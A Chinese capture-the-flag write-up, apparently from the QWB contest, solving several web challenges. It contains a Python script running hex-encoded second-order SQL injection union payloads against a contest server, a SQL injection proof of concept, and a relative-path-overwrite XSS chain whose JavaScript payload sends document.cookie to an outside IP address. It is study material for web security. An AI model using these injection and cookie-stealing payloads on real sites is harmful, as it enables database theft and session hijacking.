彩蛋
真·彩蛋
postgresql配置没有改,然后就udf getshell
Three hit
很明显的二次注入
python
# -*- coding:utf-8 -*-
import sys
import requests
from binascii import b2a_hex as b2a
from bs4 import BeautifulSoup
# select * from users where age = 1 union select 1,2,3,4,5#
'''
1 order by 1#
0x31206f72646572206279203123
1 order by 2#
0x31206f72646572206279203223
1 order by 3#
0x31206f72646572206279203323
1 order by 4#
0x31206f72646572206279203423
1 order by 5#
0x31206f72646572206279203523
4
qwb
qwb@localhost
'bertrams' union select 1,(select TABLE_NAME from information_schema.tables where table_schema='qwb' limit 0,1),3,4 limit 0,1#
0x276265727472616d732720756e696f6e2073656c65637420312c2873656c656374205441424c455f4e414d452066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d2771776227206c696d697420302c31292c332c34206c696d697420302c3123
<a>flag</a>
'bertrams' union select 1,(select column_name from information_schema.columns where table_name='flag' limit 0,1),3,4 limit 0,1#
0x276265727472616d732720756e696f6e2073656c65637420312c2873656c65637420636f6c756d6e5f6e616d652066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f6e616d653d27666c616727206c696d697420302c31292c332c34206c696d697420302c3123
<a>flag</a>
'bertrams' union select 1,(select flag from flag limit 0,1),3,4 limit 0,1#
0x276265727472616d732720756e696f6e2073656c65637420312c2873656c65637420666c61672066726f6d20666c6167206c696d697420302c31292c332c34206c696d697420302c3123
<a>QWB{M0b4iDalao0rz0rz}</a>
'''
def reg(i,sqli):
regurl = "http://39.107.32.29:10000/index.php?func=register"
data = {'username':str(i),'age':sqli,'password':'123456'}
resp = requests.post(regurl,data=data)
#print resp.content
def log(i):
logurl = "http://39.107.32.29:10000/index.php?func=login"
data = {'username':str(i),'password':'123456'}
resp = requests.post(logurl,data=data)
return resp.content
for i in xrange(1,2):
sqli = "'bertrams' union select 1,(select flag from flag limit 0,1),3,4 limit 0,1#"
print sqli
sqli = "0x"+b2a(sqli)
print sqli
i = "bertram8"+str(i)
reg(i,sqli)
content=log(i)
soup = BeautifulSoup(content,"html.parser")
flag = soup.find_all('a')[2]
print flag
Python is the best language 1
http://39.107.32.29:20000
http://117.50.16.51:20000
下载地址
备用下载地址(密码:rtou)
I'm learning the flask recently,and I think python is the best language in the world!don't you think so?
我觉得仔细调试一番代码,一定能发现注入
首先跟进routes.py文件
其中的表单使用wtform的表单检测规则
存在正则过滤不严格,单引号等字符同样符合正则,那么此处就有一个注入
然后跟进
根据sql类,我们提取出其中的字符串拼接部分 注入我们的攻击字符
又一个注入点
第一个点直接在注册的地方即可触发
第二个点登录注册后,post文章即可
第二个点的poc
'|conv(hex(substr(user(),1,8)),16, 10)|'
成功获取数据
Share your mind
http://39.107.33.96:20000/index.php
首先就是注册-->登录
Please help me find the vulnerability before I finish this site!
hint:xss bot使用phantomjs,版本2.1.1
hint2 : xss的点不在report页面
那么就是xss了
功能
write article、Reports
write article可以提交留言
Reports可以提交bug链接
Attack
那么攻击链就是通过构造xss然后提交到report
但是发现write article功能有blacklist,fuzz后得知<"&'等字符被过滤
也就是常规xss无法实现,查看源码,发现在js引用和css引用上存在差异,联想到pwnhub中小m出的rpo的题
只不过 市面上大多数rpo的攻击例子都是利用css,而这道题用js。css因为规则宽松,很容易实现攻击,而js的规则严格,因此js文件的应用必须遵循规范。
第一个要解决的问题就是将article中的html标签除去
title位置不填写就可以获得一个纯文本输入框
第二个就是如何利用rpo来欺骗客户端
加载的js 的相对位置
../static/js/jquery.min.js
攻击链接
http://39.107.33.96:20000/index.php/view/article/631/bertram/..%2f..%2f../
apache服务端(正常请求
http://39.107.33.96:20000/index.php/view/article/631/bertram/../../../../static/js/jquery.min.js
客户端
http://39.107.33.96:20000/index.php/view/article/631/bertram/..%2f..%2f../../static/js/jquery.min.js
客户端认为..%2f..%2f..是单层目录,因此不会跳转
那么客户端请求实际为
http://39.107.33.96:20000/index.php/view/article/631/bertram/static/js/jquery.min.js
那么提交链接就攻击成功了
攻击exp生成
#-*-coding:utf-8-*-
s='var iframe=document.createElement("iframe");iframe.src="/QWB_fl4g/QWB/";iframe.onload=function(){location.href="http://45.63.4.90:8080/"+escape(window.top.frames[0].document.cookie);};document.body.appendChild(iframe);'
print"eval(String.fromCharCode(",
foriins:
printstr(ord(i))+",",
print"))",
提交攻击链接
收到cookie的hit
通过iframe访问flag页面,然后获取flag
此处评论已关闭